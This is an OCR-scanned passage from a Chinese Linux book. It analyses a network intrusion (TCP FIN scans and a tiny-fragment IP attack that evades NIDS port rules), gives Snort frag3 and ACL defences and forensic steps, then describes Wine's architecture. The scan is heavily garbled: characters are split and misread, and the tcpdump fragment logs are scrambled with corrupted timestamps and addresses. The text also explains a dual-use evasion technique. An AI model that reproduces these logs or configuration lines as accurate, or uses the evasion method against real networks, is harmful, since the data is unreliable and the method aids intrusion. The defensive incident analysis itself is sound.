第 1 个 数据 包 和 我 们 刚才 看 到 的 数据 包 极 为 类 似 。 但 这 次 探测 的 服务 运行 在 6000 端口 上 ， 
它 是 一 个 Linux/UNIX 服务 ， 用 于 提供 远程 X-Window 连接 。 这 项 服务 允许 远程 用 户 访问 系统 
上 的 一 个 图 形 会 话 。 第 2 个 数据 包 是 TCP 握手 交互 过 程 中 的 一 个 标准 响应 。TCP SYN/ACK 
包 从 6000 端口 〈 即 X-Window 服务 端口 ) 发 出 ， 送 到 远程 主机 。 这 个 包 的 产生 和 接收 使 得 攻 
击 者 知道 了 系统 上 运行 这 种 服务 ， 也 就 知道 了 一 个 潜在 漏洞 的 存在 。 


2. 第 2 个 包 的 日 志 
我 们 再 次 从 单个 数据 包 中 提取 一 些 有 用 的 信息 : 


03:06:06.928333 10.1.0.1.44003 >192.168.1.1.6000: F 0:0 (0) win 3072 
从 单个 数据 包 中 提取 出 的 数据 包含 如 下 信息 。 


到 达 时 间 : 03:06:06 928333。 

源 耻 地址: 10.1.0.1。 

源 TCP 端口 : 44003。 

目标 卫 地 址 : 192.168.1.1。 

目标 TCP 端口 : 6000 (X-Window 服务 )。 

TCP 标志 下 : 标识 TCP Fin 标志 ， 通 信 流 的 终止 数据 包 。 
序列 号 /确认 号 : 0/0。 


以 下 是 第 2 个 包 的 日 志 : 


03:06:06.928393 10.1.0.1.44003 >192.168.1.1.www:E 0:0(0) win 3072 
03:06:06.928460 10.1.0.1.44003 >192.168.1.1.smtp:F 0:0(0) win 3072 
03:06:06.928530 10.1.0.1.44003 >192.168.1.1.ssh:F 0:0(0) win 3072 
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03:06:06.928599 10.1.0.1.44003 >192.168.1.1.telnet:F 0:0(0) win 3072 
03:06:06.263621 10.1.0.1.44004 >192.168.1.1.6000: F 0:0(0) win 3072 
03:06:07.263675 10.1.0.1.44004 >192.168.1.1.ssh: F 0:0 (0) win 3072 
03%06:07.583585 10.1.50.1.44003: > 192.168-1.1.ssh: FEF 0:0(0) win 3072 
03:06:07.583645 10.1.0.1.44003 >192.168.1.1.6000 : F 0:0(0) win 3072 
03:06:07.904011 10.1.0.1.44004 >192.168.1.1.ssh: F 0:0(0) win 3072 

03:06:07.904068 10.1.0.1.44004 >192.168.1.1.6000 F 0:0(0) win 3072 


下 面 是 这 些 包 的 日 志 给 我 的 提示 : 

@ 这 些 包 和 以 往 的 端口 扫描 不 太一 样 ， 这 种 攻击 方法 被 称 为 “TCP FIN 端口 扫描 ”",， 是 一 
种 比 以 前 的 连接 扫描 更 加 隐蔽 的 网 络 动作 。 

@ 攻击 者 试图 进行 二 次 端口 扫描 ， 目 标 系 统 的 端口 号 表明 这 些 包 针对 Telnet、SSH、 
SMTP、WWW 和 X-Window 服务 。 

@ 防火 墙 规则 的 改变 是 成 功 的 ， 没 有 任何 数据 包 从 内 部 网 络 返 回 给 攻击 者 。 


下 面 我 们 看 看 top 程序 的 输出 : 


3:1llam up 30 days, 1 user, load average: 2.19,1.98,2.05 
从 这 里 可 以 得 到 如 下 信息 。 


@ 当前 系统 时 间 : 3:11 am。 
@ 正常 运行 时 间 : 30 days。 
@ 当前 登录 的 用 户 数 : 1。 


系统 在 最 后 1、5、15 分 钟 内 的 负载 为 2.19、1.98、2.05， 在 一 个 单 处 理 器 系统 中 任何 高 于 


1 的 负载 都 意味 着 系统 的 运行 效率 非常 低 。 运 行 的 进程 消耗 了 大 量 的 资源 ， 内 核 也 使 用 了 大 量 
的 进程 时 间 来 管理 这 些 请 求 。 


下 面 的 信息 是 从 上 面 的 top 程序 中 提取 出 来 的 : 


21 processes: 19 sleeping,1 running,0 zombie,0 stopped 

CPU states: 0.3% user, 53.4% system,0.0% nice,46.6% idle 
Mem: 30532k av, 21276K used, 9256K free, 8036K shrd, 1956K 
Swap: 128516K av OK used,128516K free 14552K 


上 面 的 信息 中 最 值得 关注 的 是 分 配给 操作 系统 的 CPU 资源 总 量 。 正 常情 况 下 ， 包 的 重组 


和 网 络 操作 等 任务 不 会 如 此 耗费 时 间 。 如 果 超过 半数 的 计算 机 操作 时 间 用 在 内 核 , 则 可 以 肯定 
系统 出 现 了 很 严重 的 问题 。 


图 7.8 所 示 为 从 top 程序 中 提取 的 更 完整 信息 。 
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3:llam up 30 days, luser, load average: 2.19,1.98,2.05 

21 processes: 19 sleeping, ] running,0 zombie,O stopped 

SPU states: 0.3% user, 53. 4% system, 0. 0% nice, 46. 6% idle 

Wem: 30532k av, 21276K used, 9256K free, 8036K shrd, 1956K 


Swap: 128516K av， OK used, 128516K free 14552K 
PID USER PRI NI SIZE RSS SHARE STAT LIB %CPU %MEM TIME COMMAND 
253 root 2 0 904 904 708 5 0 3.9 2.9 0:01 ssh 
325 root 20 0 11241124 940 R 0 2.9 3.6 0:00 top 
lroot 0 0 188 188 160 $s§ 0 0.0 0.6 0:06 init 
2root 0 0 0 0 0 sw 0 0.0 0.0 0:00 kflushd 
3root 0 0 0 0 0 SW 0 0.0 0.0 0:00 kupdate 
4root 0 0 0 0 0 SW 0 0.0 0.0 0:00 kpiod 
5 root 0 0 0 0 0 sy 0 0.0 0.0 0:00 kswapd 
52 root 0 0 588 588 436 SS 0 0.0 1.9 0:00 cradmgr 
84 root 0 0 628 628 524 5 0 0.0 2.0 0:00 syslogd 
95 root 0 0 856 856 388 Ss 0 0.0 2.8 0:00 klogd 
97 root 0 0 628 628 516 SS 0 0.0 2.0 0:00 sshd 
99 root 0 0 524 524 432 5 0 0.0 1.7 0:00 crond 
lO0ldaemon D 0 580 580 484 S$ 0 0.0 1.8 0:00 atd 
109 root 0 0 452 452 392 ss 0 0.0 1.4 0:00 apmd 
lll root 4 0 1084 1084 812 $s§ 0 0.0 3.5 0:46 bash 
11l3 root 0 0 424 424 360 5 0 0.0 1,3 0:00 agetty 
ll4 root 0 0 424 424 360 5 0 0.0 1.3 0:00 agetty 
ll5 root 0 0 424 424 360 8 0 0.0 1.3 0:00 agetty 
ll6root 0 0 424 424 360 SS 0 0.0 1.3 0:00 agetty 
132 maggie0 0 1036 1036 804 5 0 0.0 3,3 0;00 bash 


图 7.8 top 命令 执行 结果 


上 面 的 信息 段 表 明了 系统 上 正在 运行 的 所 有 进程 ， 以 及 它们 消耗 了 多 少 CPU 资源 和 内 存 
资源 。 由 于 没有 一 个 进程 对 机 器 本 身 造成 大 量 的 资源 占用 ， 所 以 所 有 的 CPU 时 间 都 被 内 核 操 
作 占 用 了 ， 例 如 网 络 操作 ， 可 以 看 作 是 网 络 层 攻击 的 信号 ， 例 如 拒绝 服务 攻击 。 


3. 第 3 个 包 的 日 志 


让 我 们 通过 最 后 一 段 日 志 研究 一 下 数据 包 。 因 为 在 底层 人 P 数据 包 进行 分 片 ， 在 了 P 层 的 重 
组 是 必须 的 。 因 此 ， 如 果 不 进 行进 一 步 的 分 析 ，tcpdump 输出 的 数据 没有 多 少 是 有 用 的 。 我 们 
可 以 把 同一 序列 的 两 个 数据 包 组 合 在 一 起 ， 形 成 一 个 完整 的 数据 包 。 以 下 面 的 数据 包 为 例 ， 


03:10:53.056248 truncated-tcp 16 (frag 46940:16@0+) 
03:10:53.056309 10.2.0.1>192.168.1.2: (frag 46940:4@16) 


通过 这 两 个 包 ， 可 以 提取 出 如 下 信息 。 


到 达 时 间 : 03:10:53.056248。 
源 卫 地 址 : 10.2.0.1。 

源 TCP 端口 : N/A。 

目的 耳 地 址 : 192.168.1.2。 
目的 TCP 端口 : N/A。 

TCP 标志 : N/A。 

序列 号 /确认 号 : N/A。 


下 面 是 第 3 个 数据 包 的 日 志 : 
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056663 192.168.1.2.telnet>10.2.0.1.49052:R 0:0(0)ack 036410064 win 0 


056374 


truncated-tcp 16 


(frag 32970:16@0+) 


056441 10.2.0.1>192.168.1.2: (frag 32970:4@16) 


056511 


-056581 


056650 
056718 
056857 
056786 
056949 
056987 
384224 
384275 
384344 


684615 
684739 
684807 


.004160 
.004214 
.004281 
.004351 


truncated-tcp 16 
L220 T1925168 
truncated-tcp 16 
LTO:2 0 LT>192 L660 


(frag 29211:16@0+) 
.1.2: (frag 29211:4@16) 

(frag 37282:16@0+) 
-1.2: (frag 37282:4@16) 


192.168.1.2.www>10.2.0.1.49052:R 0:0(0) ack 40532387 win 0 


truncated-tcp 16 
102=0 1>192=168 


(frag 27582:16@0+) 
.1.2: (frag 27582:4816) 


192.168.1.2.smtp>10.2.0.1.49052:R 0:0(0) ack 083618358 win 0 


truncated-tcp 16 


10.2.0.1>192.168. 


truncated-tcp 16 
L102:0-1>192=168 
truncated-tcp 16 
truncated-tcp 16 
10-2-0-.1>192-168 
truncated-tcp 16 
10:2.0-1>192.168 
truncated-tcp 16 
10.2.0.1>192.168 


这 时 可 以 从 日 志 中 得 到 如 下 信息 : 


@ 这 是 一 个 来 自 新 的 IP 地 址 (10.2.0.1 ) 对 其 网 络 内 的 另 一 个 系统 ( 192.168.2 ) 的 端口 
扫描 。 
@ 数据 包 被 分 成 了 许多 小 片 ， 如 日 志 中 (frag x:16@0+ ) 所 显示 的 那样 。 
@ 当 大 量 的 碎片 包 注 入 到 网 络 中 时 ， 日志 相关 器 没有 发 出 E-mail。 


通过 对 上 面 日 志 分 析 部 分 的 讨论 ， 攻 击 进展 过 程 中 的 事件 序列 可 概括 为 如 下 几 点 


(frag 24040:16@0+) 
1.2: (frag 24040:48@16) 
(frag 54769:16@0+) 
.1.2: (frag 54769:4@16) 
(frag 43013:16@0+) 
(frag 30429:16@0+) 
.1.2: (frag 30429:4@16) 
(frag 9068:16@0+) 
.1.2: (frag 9068:4@16) 
(frag 29591:16@0+) 
:1.2: (frag 29591:4@16) 


@ 对 内 网 的 第 一 次 端口 扫描 的 意图 很 明显 ,其 目的 是 测试 该 网 络 是 否 在 向 外 发 送 E-mail。 
@ 在 第 二 次 端口 扫描 中 ， 扫 描 经 过 精心 设计 ， 悄 无 声息 地 进行 。 通 过 这 次 扫描 ， 攻 击 者 
试图 发 现 NIDS 系统 的 检测 规则 集 。 

@ 进程 转 储 (Process Dump ) 表明 ， 系 统 平 均 负 载 很 高 ， 却 没有 用 户 区 的 进程 运行 。 系 
统 内 核 的 高 负载 通常 是 由 用 户 区 代码 的 不 良 设计 引起 的 。 例 如 一 个 频繁 切换 线程 的 应 
用 程序 。 系 统 内 核 产生 的 高 负载 可 以 看 作 是 系统 的 网 络 堆栈 遭 到 攻击 的 信号 ， 就 像 这 
起 事件 中 的 一 样 。 
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经 过 上 面 的 分 析 ， 能 从 分 片 大 小 中 得 知 第 1 个 分 片 大 小 为 16 字 节 ， 小 于 TCP 报头 长 度 
20 字 节 ， 而 TCP 报头 的 剩余 4 字 节 包含 在 第 2 个 分 片 中 ， 具 有 这 种 特征 的 攻击 叫做 人 P 碎片 
攻击 ,正常 情况 下 NIDS 入 侵 检测 系统 ， 首 先 通过 判断 目的 端口 号 来 允许 或 禁止 。 但 是 由 于 通 
过 恶意 分 片 使 目的 端口 号 位 于 第 2 个 分 片 中 , 因此 NIDS 设备 仅 通过 判断 第 1 个 分 片 就 决定 后 
续 的 分 片 是 否 允 许 通 过 ， 也 就 是 说 NIDS 看 不 到 一 个 完整 的 TCP 头 ， 所 以 不 能 对 应 相应 的 过 
滤 规 则 ， 也 就 是 面 对 这 种 攻击 NIDS 失去 了 作用 。 

但 是 这 些 分 片 在 目标 主机 上 进行 重组 之 后 将 形成 卫 碎片 攻击 。 通 过 这 种 方法 可 以 迁 回 
NIDS 系统 (目前 一 些 最 新 的 智能 包 过 滤 设 备 将 直接 丢掉 报头 中 未 包含 端口 信息 的 分 片 》。 了 P 
包头 的 配置 和 片段 可 以 完全 通过 在 访问 点 以 外 的 防火 墙 过 滤 策 略 并 且 不 被 NIDS 系统 检测 到 ， 
也 就 不 会 发 出 E-mail。 大 家 可 能 会 问 为 什么 会 这 样 呢 ?了 IP 分 组 的 理论 长 度 可 达 64KB, 如 果 下 
层 要 发 送 的 数据 报 文 的 长 度 超过 了 链 路 的 MTU, 那么 IP 层 就 要 对 数据 报 文 进行 分 片 操作 , 使 
每 一 片 的 长 度 都 小 于 或 等 于 MTU。 在 报 文 的 接收 端 ， 需 要 对 分 片 的 报 文 重组 。 路 由 器 需要 耗 
费 控制 通路 的 资源 来 处 理 他 分 片 和 重组 。 对 于 终端 而 言 ， 卫 分 片 和 重组 不 是 在 网 卡 的 专用 硬 
件 上 完成 的 ， 而 是 由 操作 系统 完成 的 ， 每 个 报 文 的 处 理 都 要 产生 中 断 ， 内 存 复 制 ， 耗 费 大量 的 
CPU 周期 。 对 于 目前 主流 服务 器 的 网 络 接口 都 是 1GB/s， 那 么 1500 字 节 报 文 的 到 达 间 隔 是 
12hs。 这 就 是 为 什么 RHAS (192.168.1.2) 负载 居 高 不 下 的 原因 。 

攻击 者 利用 上 述 特征 ， 将 攻击 流量 进行 分 片 后 向 攻击 目标 发 送 ， 导 致 目标 主机 因 处 理 人 P 
碎片 能 力 耗 尽 。 为 解决 这 一 问题 ,NIDS 软件 经 过 配置 ， 已 经 实现 了 IP 碎片 重组 的 功能 。 


7.3.4 ”针对 IP 碎片 攻击 的 预防 措施 


1. 配置 Snort 抵御 IP 碎片 攻击 


frag3 是 Snort 进行 碎片 处 理 的 预 处 理 程序 (Preprocessor) ， 基 于 目标 的 耳 分 片 重组 ， 通 
过 在 其 配置 文件 输入 被 保护 目标 碎片 重组 的 相关 信息 ， 就 可 以 使 Snort 与 目标 具有 相同 的 碎片 
处 理 方式 ， 从 而 消除 上 述 两 种 人 P 碎片 逃避 攻击 , 如 NIDS 负责 保护 两 个 子 网 192.168.1.0/24 和 
192.168.2.0/24 中 的 Windows 客户 机 和 Linux 服务 器 , Windows 和 Linux 分 别 采 用 First 和 Linux 
的 重 登 碎片 重组 方式 ， 而 且 碎 片 重组 超时 时 间 分 别 为 60s 和 30s， 那 么 我 们 可 以 如 下 所 示 进 行 
frag3 的 配置 。 

通过 Snort 安装 doc 目录 的 README.frag3， 可 以 得 到 更 多 相关 背景 和 配置 消息 。 一 般 针 
对 预 处 理 的 配置 形式 如 下 : 


preprocessor <name of processor>: <configuration _ options> 
snort 配置 样 例 snort.conf: 


preprocessor frag3 global: 
preprocessor frag3 engine: 
prealloc frags 8192 


policy first\ 
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bind to 192.168.1.0/24\ 
timeout 60\ 

preprocessor frag3 engine: 
policy linux\ 

bind to 192.168.2.0/24\ 


timeout 30\ 


2. 利用 防火 墙 ACL 防止 碎片 攻击 
前 面 讨论 了 了 IP 碎片 攻击 是 指 通过 恶意 操作 ， 发 送 极 小 的 分 片 来 绕 过 包 过 滤 系 统 ， 接 下 来 
我 们 在 边界 路 由 器 上 利用 扩展 ACL 即 可 对 IP Fragment 攻击 进行 控制 ， 命 令 如 下 : 


access-list 101 permit/deny < 协议 > < 源 地 址 > < 目的 > fragment “在 命令 后 加 个 fragment 
即 可 


如 果 是 未 分 片 数 据 包 (nonfragmented) 或 者 分 片 数据 包 的 第 一 个 分 片 (initial fragment) ， 
都 将 按 正 常 的 ACL 进行 控制 。 如 果 是 分 片 数据 包 的 后 续 分 片 “noninitial fragment) ， 则 只 检 
查 ACL 条 目 中 的 三 层 部 分 (协议 号 、 源 、 目 的 ) 。 如 果 三 层 匹 配 而 且 是 permit 控制 ， 则 允 
许 该 分 片 通过 ; 如 果 三 层 匹 配 而 且 是 deny 控制 ， 则 继续 检查 下 一 个 ACL 条 目 。 


7.3.5 评估 NIDS 的 两 个 工具 


下 面 介 绍 两 款 用 于 评估 IDS 系统 的 工具 : 一 个 是 Anzen NIDSbench, 包含 了 一 个 强迫 所 有 
的 数据 流 分 片 单元 ; 另 一 个 是 NAI 的 CyberCop Scanner 内 置 CASL, 它 可 以 用 来 对 上 述 的 插 
入 /逃避 方面 的 内 容 进 行 确认 性 的 测试 , 这 些 工具 都 将 有 助 于 你 了 解 现 有 漏洞 扫描 系统 的 弱点 。 


7.3.6 ”服务 器 被 入 侵 后 应 该 做 的 5 件 事 


服务 器 被 入 侵 后 , 我 们 该 做 些 什么 ? 在 这 一 案例 中 ,已 经 确认 该 服务 器 被 攻破 ， 随 后 进行 
了 取证 工作 并 获取 了 日 志 。 当 各 位 读者 发 现 自己 的 机 器 疑似 中 毒 或 者 被 攻击 了 该 做 出 以 下 几 种 
操作 。 

1. 尽量 维持 原状 保持 好 现场 


这 是 最 容易 被 忽略 的 动作 ， 当 你 发 现 机 器 几乎 死机 动弹 不 得 时 (很 多 情况 下 并 没有 死机 ， 
只 是 暂时 无 响应 ) ， 你 的 第 一 反应 是 重启 机 器 。 这 是 完全 错误 的 ， 首 先 我 们 应 该 冷静 的 逐步 切 
断 该 主机 与 网 络 的 连接 ， 以 避免 有 入 侵 者 再 次 进入 系统 ， 保 存 好 主机 内 的 所 有 日 志 。 

2. 记录 当前 系统 的 运行 情况 


在 保持 好 现场 并 中 断 与 网 络 连接 之 后 ,如 果 终 端 还 能 够 操作 的 话 ,利用 ps -aux >/tmp/ps.log 
保存 系统 的 进程 ， 以 及 网 络 连接 情况 。 这 些 信息 都 有 助 于 帮助 你 判断 系统 的 入 侵 行 为 。 
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3. 通过 LiveCD 光盘 系统 引导 进入 系统 的 文件 系统 


当 通 过 救援 模式 挂 载 硬盘 中 的 文件 系统 , 我 们 就 能 查看 真实 情况 了 。 如 果 系 统 损毁 的 很 严 
重 , 首先 我 们 就 要 尽量 多 的 备份 好 数据 到 外 部 存储 器 中 。 如 果 是 司法 取证 还 应 当 在 第 一 时 间 对 
获取 的 文件 做 MD5 (如 果 涉及 商业 犯罪 ,这 些 一 手 资 料 应 提交 给 司法 部 门 )。 


4. 通过 备份 出 的 信息 分 析 攻 击 者 来 源 


通过 刚刚 备份 出 来 的 日 志 信息 可 查 出 攻击 者 的 蛛丝马迹 ， 要 搞 清楚 到 底 是 因为 SSH 漏洞 
还 是 Apache 漏洞 才 使 得 攻击 者 得 手 ， 分 析 攻击 者 来 源 是 最 需要 技巧 和 经 验 的 了 。 


5. 重新 安装 系统 并 启用 各 种 监控 记录 设备 


一 旦 你 的 重要 系统 被 入 侵 ， 远 不 止 你 发 现 的 这 些 问题 ， 这 或 许 只 是 冰山 一 角 ， 当 你 备份 好 
系统 并 取证 完毕 之 后 就 要 开始 重 构 系 统 环 境 (一 般 情况 下 从 系统 分 区 这 个 步骤 开始 ) ， 系 统 安 
装 完毕 后 开始 对 系统 进行 优化 和 加 固 处 理 ， 开启 监控 和 审计 系统 ， 以 便 更 好 地 跟踪 、 分 析 和 锁 
定 攻击 者 ， 如 果 有 必要 可 以 对 整个 系统 建立 一 个 MD5 校 验 码 。 

这 5 个 步骤 是 个 参考 流程 , 大 家 可 以 根据 自己 的 实际 情况 执行 , 但 大 致 方法 和 顺序 是 不 变 
的 ， 大 家 一 定 要 注意 ， 遇 到 系统 被 入 侵 的 事件 时 ， 一 定 不 要 让 你 的 机 器 重启 ， 那 样 会 造成 相关 
细节 信息 无 法 重 现 ， 从 而 影响 到 对 事件 的 判断 和 今后 安全 策略 的 制定 。 


7.3.7 小 结 


在 这 次 攻击 事件 中 ， 使 用 实时 的 网 络 分 析 工 具 要 比 等 待 NIDS 机 器 发 出 E-mail 有 效 得 多 。 
这 种 情况 下 , 许多 优秀 的 网 络 监听 和 分 析 工 具 , 例如 TcpDump、Ethereal 等 , 都 是 非常 有 用 的 。 
即使 是 在 攻击 者 对 内 部 系统 造成 严重 破坏 前 发 现 攻击 , 接 下 来 还 是 有 许多 取证 工作 要 做 : 必须 
对 每 一 台 机 器 都 进行 分 析 和 测试 ， 以 确定 没有 被 安 上 Root Kits， 攻 击 者 可 能 会 使 用 更 多 常规 
的 攻击 手段 对 网 络 再 次 进行 攻击 。 通常 情况 下 , 大 范围 的 安全 审计 可 以 发 现 外 部 攻击 者 穿 透 内 
部 网 络 的 许多 问题 。 


第 8 章 虚拟 化 技术 应 用 案例 


8.1 Linux 下 Wine 虚拟 机 


Linux 源码 公开 且 可 以 裁剪 的 特点 使 其 在 商用 服务 器 以 及 终端 市 场 上 的 占有 率 稳步 提高 ， 
而 Windows 的 技术 完全 被 微软 垄断 ， 所 以 越 来 越 多 的 用 户 在 采购 操作 系统 时 更 倾向 于 Linux。 
但 Linux 中 应 用 软件 不 多 的 现状 已 成 为 目前 号 待 解决 的 问题 ， 将 Windows 中 的 软件 转移 到 
Linux 中 正 可 以 弥补 这 一 缺陷 。Vmware 和 Win4Lin 是 两 种 现在 的 技术 实现 : Vmware 方式 ， 
利用 一 台 Linux 操作 系统 的 计算 机 的 部 分 内 存 、 硬 盘 资 源 构建 成 一 台 “ 独 立 ” 的 虚拟 计算 机 ， 
在 建立 的 虚拟 环境 中 安装 Windows 操作 系统 ,运行 Windows 软件 ; Win4Lin 方式 , 允许 在 Linux 
上 安装 Windows 系统 ， 其 核心 采用 了 Unix 的 Merge 技术 ， 即 在 Unix 下 允许 Windows 直接 访 
问 预定 义 的 中 断 .IO 接口 以 及 DMA 通道 ,以 上 两 种 实现 都 在 Linux 上 建立 了 完整 的 Windows 
环境 ， 而 Wine (Wine Is Not an Emulator) 无 此 要 求 。 它 对 Windows 的 仿真 基于 API， 即 用 
Linux 共享 库 实 现 Windows API。 


8.1.1 Wine 的 体系 结构 


目前 Wine 实现 了 Windows 体系 结构 中 的 Win32 子 系统 ， 它 与 Linux 系统 的 交互 方式 如 
8.1 所 示 。 


图 8.1 Wine 的 体系 结构 


Linux 结构 可 分 为 三 层 : Linux 提供 的 Libc 和 Libx11 等 共享 库 、Linux 内 核 与 Linux 设备 
驱动 。Wine 结构 中 各 模块 的 功能 如 下 。 


Linux ”企业 应 用 案例 精 解 


@ Windows DLLs: Wine 提供 的 各 种 Windows 动态 库 ， 包 括 Wine 内 置 (由 Linux 共享 
库 实现 ) 与 Windows 操作 系统 原始 的 动态 库 , 使 用 原始 动态 库 函 数 能 够 保证 其 与 对 应 
的 Windows 程序 的 功能 需求 完全 兼容 。 内 置 的 动态 库 将 替换 Windows 原始 的 动态 库 。 

@ Windows (NT ) Core DLLs: 包含 NTDLL 、KERNELKERNEL32 、GDIGDI32 、 
USER/USER32 这 4 对 DLL. 这 些 DLL 均 属 于 Windows 的 内 核 文 件 ,其 他 Windows DLL 
都 建立 在 这 些 核 心 DLL 基础 上 。Wine 建立 在 Linux 内 核 上 , 没有 实现 Windows 内 核 ， 
所 以 这 些 DLL 在 Wine 中 都 需要 重新 实现 。 

@ Wine Server: 管理 Wine 启动 的 各 类 进程 ， 其 功能 相当 于 Wine 内 核 。 

@ Wine executadle: 在 Wine 中 可 以 直接 运行 的 可 执行 文件 ， 包 括 DOS、Win16、Win32 
以 及 Winelib。Winelib 是 指 Windows 程序 的 源码 在 Wine 中 编译 生成 的 可 执行 文件 ， 
Wine 提供 了 产生 这 种 执行 文件 的 工具 ( Winebuild )。 

@ Wine drivers: Wine 在 Linux 内 核 上 建立 了 一 个 提供 Windows NTDLL 与 KERNEL32 功能 
的 代理 层 。 这 种 设计 方式 决定 了 Windows 程序 在 Linux 中 使 用 驱动 必须 满足 该 设备 在 Linux 
中 被 支持 或 Wine 已 经 实现 了 Windows 驱动 的 API 与 Linux 驱动 接口 粘 合 的 代理 功能 。 


8.1.2 ”Wine 运行 的 技术 背景 
1. Wine Server 的 工作 原理 


Wine Server 用 于 实现 Wine 中 运行 的 进程 /线程 之 间 的 通信 、 同 步 以 及 Win32 对 象 等 的 管 
理 。Wine 启动 时 ， 会 随 之 建立 一 个 Linux Socket， 此 后 所 有 启动 的 Wine 进程 都 使 用 该 Socket 
与 Wine Server 启动 ， 最 后 一 个 Wine 进程 结束 时 Wine Server 自动 关闭 。Wine 进程 中 的 线程 
都 有 各 自 的 请 求 缓 冲 区 ， 该 缓冲 区 与 Wine Server 共享 。 线 程 需要 和 其 他 线程 /进程 同步 时 ， 首 
先 填充 请 求 缓冲 区 ， 并 通过 Socket 发 送 一 个 命令 码 ，Wine Server 根据 命令 执行 相关 的 操作 。 
当 客 户 进程 等 待 一 个 响应 〈 如 同步 原 语 ) 时 ，Wine Server 将 其 标记 为 等 待 状态 ， 在 等 竺 条件 
满足 后 给 予 回应 。Wine Server 自身 为 单个 、 独 立 的 Linux 进程 ， 它 没有 自己 的 线程 ， 而 是 一 
个 大 的 循环 中 反复 检查 客户 进程 是 否 发 送 了 命令 ， 因 此 内 部 不 存在 竞 态 条 件 。 

客户 进程 需要 了 解 任 何 Win32 对 象 手柄 联系 的 Linux 文件 描述 符 时 ， 客 户 进程 可 发 送 请 
求 至 Wine Server，Wine Server 返回 一 个 复制 的 描述 符 ， 客 户 进程 结束 时 关闭 该 描述 符 。 


2. Wine 建立 的 TEB 结构 介绍 


所 有 的 Win32 代码 都 假定 了 运行 环境 中 存在 某 些 特定 的 结构 ,如 TEB(Thread Environment 
Block) 连接 着 每 一 个 线程 ， 它 存储 了 诸如 TLS (Thread Local Store) 槽 、 一 个 指向 线程 消息 
队列 的 指针 、 最 后 一 次 错误 的 代码 等 ; 此 外 , TEB 还 包括 SEH (Structured Exception Handling) ， 
用 于 抛 出 “This program has performed an illegal operation and will be terminated ”等 类 似 信息 。 

所 有 “活着 ”的 线程 都 必须 有 一 个 与 Wine Server 的 连接 ; 同样 ，Wine Server 必须 记录 所 
有 “活着 ”的 Win32 线程 ， 用 于 精确 报告 程序 其 他 部 分 的 信息 、 分 派 APC (Asynchronous 
Procedure Calls) 等 。 因 此 线程 初始 化 的 一 部 分 就 是 初始 化 线程 的 服务 器 端 ， 服 务 器 端 不 仅 有 
该 线程 的 正确 信息 ， 还 有 一 组 文件 描述 符 用 于 线程 与 Wine Server 的 通信 。 
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3. DLL 加 载 方法 分 析 


Wine 内 置 的 DLL 由 Linux 共享 库 实现 ， 共 享 库 包含 了 作为 DLL 的 代码 及 其 他 相关 信息 ， 如 
DLL 资源 、DLL 描述 符 以 及 一 个 构造 器 , 当 共 享 库 被 载 入 内 存 时 , 该 构造 器 被 调用 且 在 Wine DLL 
加 载 器 (Preloader) 上 注册 该 DLL 的 描述 符 。DLL 描述 符 在 内 存 中 创建 一 个 PE-header， 用 于 提 
供 DLL 的 入 口 点 、 资源 、 节 、debug、 模 块 的 依赖 性 等 信息 。Windows 原始 的 DLL 也 有 类 似 结构 ， 
Wine 利用 这 些 信息 处 理 DLL 的 导入 节 / 导 出 节 。 当 一 个 应 用 进程 需要 加 载 DLL 时 ， 它 依次 按 下 
列 方式 查找 : 


咒 通过 已 注册 的 DLL 列表 。 
贺 根据 WineDLLPATH 的 环境 变量 进行 搜索 。 
贺 加 载 Windows 原始 的 DLL. 


DLL 实例 化 后 被 dlopen0 〇 映射 进 内 存 。Wine 利用 Linux 共享 库 的 动态 装载 能 力 对 必须 重 
定位 的 DLL 进行 重 定位 。Wine 是 32 位 代码 ，Linux 中 的 stdcall (gcc) 支持 Windows 常规 调 
用 ， 因 此 可 以 直接 替换 Wine 处 理 器 中 的 地 址 导入 Win32 代码 ， 但 对 于 16 位 模块 还 需要 添加 
thunk 进行 地 址 等 方面 的 转换 。 


8.1.3 ”Wine 启动 分 析 


由 于 Linux 早期 版 本 提供 的 线程 API 不 够 强大 ， 不 足以 实现 Windows API 线程 部 分 ，Wine 
利用 Linux Kernel Thread 重新 构建 了 Windows 线程 API 函数 ,该 部 分 在 Wine 中 称 为 Wine-kthread。 
随 着 Linux 的 发 展 ，Linux 在 后 来 的 版 本 中 出 现 了 功能 强大 的 NPTL 线程 子 系统 ，Wine 利用 此 系 
统 提供 的 API 函数 粘 合 了 Windows 线程 API 函数 ， 此 部 分 称 为 Wine-pthread。Wine 在 启动 前 首 
先 检查 用 户 使 用 的 线程 模式 并 执行 由 Wine-pthread 或 Wine-kthread 实现 的 Wine-preloader。 它 是 一 
个 没有 main 主 函 数 的 ELF 文件 ， 用 于 在 新 建 的 Wine 进程 中 设置 Win32 类 型 的 进程 地 址 空间 布 
局 后 转 入 Wine 的 main 函数 ，Wine 被 启动 。Preloader 通过 这 种 方式 传递 一 些 必要 信息 到 libwine 

(Wine 的 动态 库 ) 中 ， 并 调用 函数 Wine-init 进行 debug 功能 和 地 址 空间 方面 的 处 理 。 以 后 依次 
执行 下 列 操作 : 


Wine-process-init 建立 Win32 程序 运行 所 必需 的 结构 ， 如 PEB、TEB、 进 程 推 以 及 与 
Wine Server 的 连接 等 。 

因 Wine-kemel-init: 依次 执行 ， 从 Wine Server 获得 新 进程 启动 时 必需 的 信息 ; 初始 化 
新 进程 的 注册 以 及 其 他 相关 部 分 ; 确定 被 加 载 文件 的 类 型 以 后 该 应 用 程序 被 载 入 内 存 。 

贺 新 载 入 Windows 程 序 运行 的 开始 .首先 , startprocess 建 立 SHE, 调 用 NtdllILdr-Initializer 
Thuck 执行 进程 初始 化 的 其 他 部 分 ， 如 进行 重 定位 以 及 调用 DLL 的 构造 函数 等 。 最 后 ， 执 行 
转 入 被 载 入 应 用 程序 的 入 口 点 ,应 用 程序 开始 执行 , Wine 提供 的 API 就 可 以 被 正确 地 调用 了 ， 
随后 当 执 行 从 应 用 程序 返回 时 ， 调 用 ExitProcess 函数 结束 该 进程 。 
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8.1.4 Win32 启动 分 析 


从 命令 行 启动 一 个 Wine 进程 时 ，Wine 首先 检查 操作 系统 使 用 的 线程 模式 ,启动 Wine 装 
载 器 。Wine 从 Linux 中 取得 诸如 运行 环境 、 命 令 行 参数 等 必要 的 资源 后 依次 执行 以 下 操作 : 


NTDLL.dllso 被 Linux 的 标准 共享 库 装 载 器 载 入 内 存 ， 在 Linux 中 建立 PEB、TEB、 
进程 堆 以 及 与 Wine Server 的 连接 等 。 

贺 利用 Windows 动态 装载 能 力 加 载 keme132，_wine kemel init() 处 理 所 有 装载 与 执行 
